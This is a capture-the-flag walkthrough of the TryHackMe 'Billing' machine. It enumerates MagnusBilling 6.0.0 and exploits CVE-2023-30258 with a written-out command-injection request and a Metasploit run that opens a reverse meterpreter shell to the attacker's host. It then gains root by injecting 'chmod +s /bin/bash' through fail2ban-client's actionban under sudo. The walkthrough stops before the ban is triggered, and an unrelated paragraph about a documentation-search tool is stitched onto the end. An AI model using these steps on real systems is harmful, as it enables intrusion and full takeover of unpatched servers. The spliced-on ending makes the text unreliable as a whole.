# Billing ## SUMMARY Billing is an Easy machine from TryHackMe that teaches about proper enumeration and vulnerability research. The initial access is based on MagnusBilling software which is vulnerable to CVE-2023-30258 which is an unauthenticated command injection vulnerability on the application. For escalating our privileges, we utilized the compromised user's `sudo` permissions and `fail2ban` to gain a shell as `root`. ### NMAP Running our nmap scan, we find 2 ports open. SSH on port `22` and HTTP on port `80`. We see that OpenSSH `9.2p1` is running and it is a Debian-based distribution for the SSH service. HTTP is running Apache `2.4.62` and has `robots.txt` for `/mbilling/`. ``` $ sudo nmap -sC -sV 10.201.68.8 -oA nmap/port [sudo] password for kali: Starting Nmap 7.95 ( ) at 2025-08-17 14:32 PST Nmap scan report for 10.201.68.8 Host is up (0.36s latency). Not shown: 997 closed tcp ports (reset) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 9.2p1 Debian 2+deb12u6 (protocol 2.0) | ssh-hostkey: | 256 86:ab:df:b4:69:ba:93:e2:df:c3:3d:4a:f6:1c:6f:21 (ECDSA) |_ 256 d6:62:b4:b1:e4:6a:e5:7e:25:62:e1:91:1c:7c:09:7b (ED25519) 80/tcp open http Apache httpd 2.4.62 ((Debian)) | http-robots.txt: 1 disallowed entry |_/mbilling/ | http-title: MagnusBilling |_Requested resource was 3306/tcp open mysql MariaDB 10.3.23 or earlier (unauthorized) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at . Nmap done: 1 IP address (1 host up) scanned in 105.65 seconds ``` ### Web Enumeration Visiting port `80`, we find that it is running [MagnusBilling](https://www.magnusbilling.org/) which is a free open-source VoIP billing software to Asterisk.

Visiting their official website, we find that the default credentials for the software is `root:magnus`.

Testing the credentials fails. ### Probable Version Disclosure During the enumeration, we find that it loads a file named `black-neptune.json`. Inside the JSON contains the version used or MagnusBilling which is `6.0.0`. REQUEST: ``` GET /mbilling/black-neptune.json?_dc=1755412769357 HTTP/1.1 Host: 10.201.68.8 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Connection: keep-alive Referer: http://10.201.68.8/mbilling/ Cookie: PHPSESSID=vsi5vc6ja1gvinduarvbpm6tha ``` RESPONSE: ``` HTTP/1.1 200 OK Date: Sun, 17 Aug 2025 06:39:28 GMT Server: Apache/2.4.62 (Debian) Last-Modified: Tue, 16 Jun 2020 08:43:48 GMT ETag: "844-5a82f8abb1900" Accept-Ranges: bytes Content-Length: 2116 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/json { [...SNIP...] "name": "MBilling", "version": "6.0.0.0", "framework": "ext", "loader": { "cache": "20191015090039", "cacheParam": "_dc" }, [...SNIP...] } ``` ### CVE-2023-30258 Based on the version, it may be vulnerable to `CVE-2023-30258` which is a unauthenticated command injection vulnerability in `lib/icepay/icepay.php` which does a call to `exec()`. The parameter used to `exec()` includes the GET parameter `democ` which is controlled by the user and does not provide sufficient sanitation. The vulnerable parameter can be exploited by sending a payload within `/dev/null;{command};#`. Testing it manually, we can confirm there is command injection. REQUEST: ``` GET /mbilling/lib/icepay/icepay.php?democ=/dev/null;ping+-c+4+10.17.42.207;%23 HTTP/1.1 Host: 10.201.68.8 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Connection: keep-alive Cookie: PHPSESSID=vsi5vc6ja1gvinduarvbpm6tha Upgrade-Insecure-Requests: 1 Priority: u=0, i ``` RESPONSE: ``` HTTP/1.1 200 OK Date: Sun, 17 Aug 2025 06:58:34 GMT Server: Apache/2.4.62 (Debian) Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 ``` TCPDUMP: ``` $ sudo tcpdump -i tun0 icmp [sudo] password for kali: tcpdump: verbose output suppressed, use -v[v]... for full protocol decode listening on tun0, link-type RAW (Raw IP), snapshot length 262144 bytes 14:58:36.083339 IP 10.201.68.8 > 10.17.42.207: ICMP echo request, id 2570, seq 1, length 64 14:58:36.083472 IP 10.17.42.207 > 10.201.68.8: ICMP echo reply, id 2570, seq 1, length 64 14:58:37.101371 IP 10.201.68.8 > 10.17.42.207: ICMP echo request, id 2570, seq 2, length 64 14:58:37.101434 IP 10.17.42.207 > 10.201.68.8: ICMP echo reply, id 2570, seq 2, length 64 14:58:38.171519 IP 10.201.68.8 > 10.17.42.207: ICMP echo request, id 2570, seq 3, length 64 14:58:38.171594 IP 10.17.42.207 > 10.201.68.8: ICMP echo reply, id 2570, seq 3, length 64 14:58:39.195293 IP 10.201.68.8 > 10.17.42.207: ICMP echo request, id 2570, seq 4, length 64 14:58:39.195395 IP 10.17.42.207 > 10.201.68.8: ICMP echo reply, id 2570, seq 4, length 64 ``` We can then use Metasploit’s module to exploit the vulnerability. ``` $ msfconsole -q msf6 > use exploit/linux/http/magnusbilling_unauth_rce_cve_2023_30258 [*] Using configured payload php/meterpreter/reverse_tcp msf6 exploit(linux/http/magnusbilling_unauth_rce_cve_2023_30258) > set rhosts 10.201.68.8 rhosts => 10.201.68.8 msf6 exploit(linux/http/magnusbilling_unauth_rce_cve_2023_30258) > set lhost 10.17.42.207 lhost => 10.17.42.207 msf6 exploit(linux/http/magnusbilling_unauth_rce_cve_2023_30258) > run [*] Started reverse TCP handler on 10.17.42.207:4444 [*] Running automatic check ("set AutoCheck false" to disable) [*] Checking if 10.201.68.8:80 can be exploited. [*] Performing command injection test issuing a sleep command of 4 seconds. [*] Elapsed time: 4.72 seconds. [+] The target is vulnerable. Successfully tested command injection. [*] Executing PHP for php/meterpreter/reverse_tcp [*] Sending stage (40004 bytes) to 10.201.68.8 [+] Deleted HrWqaGUMRRKjhm.php [*] Meterpreter session 1 opened (10.17.42.207:4444 -> 10.201.68.8:57978) at 2025-08-17 15:01:55 +0800 meterpreter > ``` We can then use meterpreter’s `shell` command to get a shell on the machine. ``` meterpreter > shell Process 2663 created. Channel 0 created. which python3 /usr/bin/python3 python3 -c 'import pty;pty.spawn("/bin/bash")' asterisk@ip-10-201-68-8:/var/www/html/mbilling/lib/icepay$ whoami whoami asterisk asterisk@ip-10-201-68-8:/var/www/html/mbilling/lib/icepay$ id id uid=1001(asterisk) gid=1001(asterisk) groups=1001(asterisk) asterisk@ip-10-201-68-8:/var/www/html/mbilling/lib/icepay$ ``` We find `user.txt` in `/home/magnus/`. ``` asterisk@ip-10-201-68-8:/home/magnus$ ls -la ls -la total 76 drwxr-xr-x 15 magnus magnus 4096 Sep 9 2024 . drwxr-xr-x 5 root root 4096 Aug 16 21:29 .. lrwxrwxrwx 1 root root 9 Mar 27 2024 .bash_history -> /dev/null -rw------- 1 magnus magnus 220 Mar 27 2024 .bash_logout -rw------- 1 magnus magnus 3526 Mar 27 2024 .bashrc drwx------ 10 magnus magnus 4096 Sep 9 2024 .cache drwx------ 11 magnus magnus 4096 Mar 27 2024 .config drwx------ 3 magnus magnus 4096 Sep 9 2024 .gnupg drwx------ 3 magnus magnus 4096 Mar 27 2024 .local -rwx------ 1 magnus magnus 807 Mar 27 2024 .profile drwx------ 2 magnus magnus 4096 Mar 27 2024 .ssh drwx------ 2 magnus magnus 4096 Mar 27 2024 Desktop drwx------ 2 magnus magnus 4096 Mar 27 2024 Documents drwx------ 2 magnus magnus 4096 Mar 27 2024 Downloads drwx------ 2 magnus magnus 4096 Mar 27 2024 Music drwx------ 2 magnus magnus 4096 Mar 27 2024 Pictures drwx------ 2 magnus magnus 4096 Mar 27 2024 Public drwx------ 2 magnus magnus 4096 Mar 27 2024 Templates drwx------ 2 magnus magnus 4096 Mar 27 2024 Videos -rw-r--r-- 1 magnus magnus 38 Mar 27 2024 user.txt asterisk@ip-10-201-68-8:/home/magnus$ cat user.txt cat user.txt THM{...REDACTED...} asterisk@ip-10-201-68-8:/home/magnus$ ``` ## Privilege Escalation Using `sudo -l`, we find that the `asterisk` user is able to `/usr/bin/fail2ban-client` as anyone so its possible to escalate privileges using it. ``` asterisk@ip-10-201-68-8:/home/magnus$ sudo -l sudo -l Matching Defaults entries for asterisk on ip-10-201-68-8: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin Runas and Command-specific defaults for asterisk: Defaults!/usr/bin/fail2ban-client !requiretty User asterisk may run the following commands on ip-10-201-68-8: (ALL) NOPASSWD: /usr/bin/fail2ban-client asterisk@ip-10-201-68-8:/home/magnus$ ``` Checking for the specific vulnerability here, we find that this is a misconfiguration, allowing for a user with sudo privileges to restart the `fail2ban` service and then adding in a malicious command via the `actionban` parameter. To escalate our privileges, we first have to: 1. Restart the service 2. Create a new action with an injected malicious command, allowing us to escalate our privilege. 3. Ban an IP address to trigger the new action. ``` asterisk@ip-10-201-68-8:/home/magnus$ sudo /usr/bin/fail2ban-client restart sudo /usr/bin/fail2ban-client restart Shutdown successful 2025-08-16 22:15:12,287 fail2ban.configreader [3006]: WARNING 'allowipv6' not defined in 'Definition'. Using default one: 'auto' Server ready asterisk@ip-10-201-68-8:/home/magnus$ sudo /usr/bin/fail2ban-client set sshd action iptables-multiport actionban "/bin/bash -c 'chmod +s /bin/bash'" ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.